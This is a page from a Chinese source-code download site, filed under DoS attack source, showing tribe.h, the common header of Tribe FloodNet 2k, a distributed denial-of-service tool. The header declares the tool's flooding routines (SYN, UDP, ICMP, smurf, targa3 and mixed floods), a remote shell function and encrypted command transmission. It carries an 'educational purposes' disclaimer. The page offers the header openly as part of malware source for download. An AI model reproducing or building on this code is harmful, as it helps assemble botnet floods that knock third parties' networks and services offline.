⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 tribe.h

📁 DOS攻击源码
💻 H
字号:
/* * Tribe FloodNet - 2k edition * by Mixter <mixter@newyorkoffice.com> * * tribe.c - common definitions and includes * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */#ifndef TRIBE_H#define TRIBE_H#include <stdio.h>#include <ctype.h>#include <unistd.h>#include <fcntl.h>#include <signal.h>#include <sys/time.h>#include <sys/types.h>#include <sys/socket.h>#include <netdb.h>#include <errno.h>int rand (void);		/* standard function prototypes */long int random (void);void srandom (unsigned int seed);void srand (unsigned int seed);int atoi (const char *nptr);int system (const char *string);char *getpass (const char *prompt);char *strtok (char *s, const char *delim);void *calloc (size_t nmemb, size_t size);void *malloc (size_t size);void free (void *ptr);void bzero (void *s, int n);void *memset (void *s, int c, size_t n);char *strncpy (char *dest, const char *src, size_t n);int strcasecmp (const char *s1, const char *s2);#include "ip.h"#include "aes.h"#include "config.h"//char shameless_self_promotion[] = "\t\t[tribe flood network]\t (c) 1999 by Mixter\n\n";#define BS 4096void random_init (void);inline long getrandom (int, int);void trimbuf (char *);#ifdef ATTACKLOGvoid dbug (char *);#endifvoid tfntransmit (unsigned long, unsigned long, int, char, char *);void syn (unsigned long, unsigned short);void udp (unsigned long);void targa3 (unsigned long);void icmp (unsigned long, unsigned long);inline unsigned long k00lip (void);void must_kill_all (void);void commence_udp (char *);void commence_syn (char *, int);void commence_icmp (char *);void commence_mix (char *);void commence_smurf (char *);void commence_targa3 (char *);void shellsex (int);struct tribe  {    char start;    char id;    char end;  };#endif

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -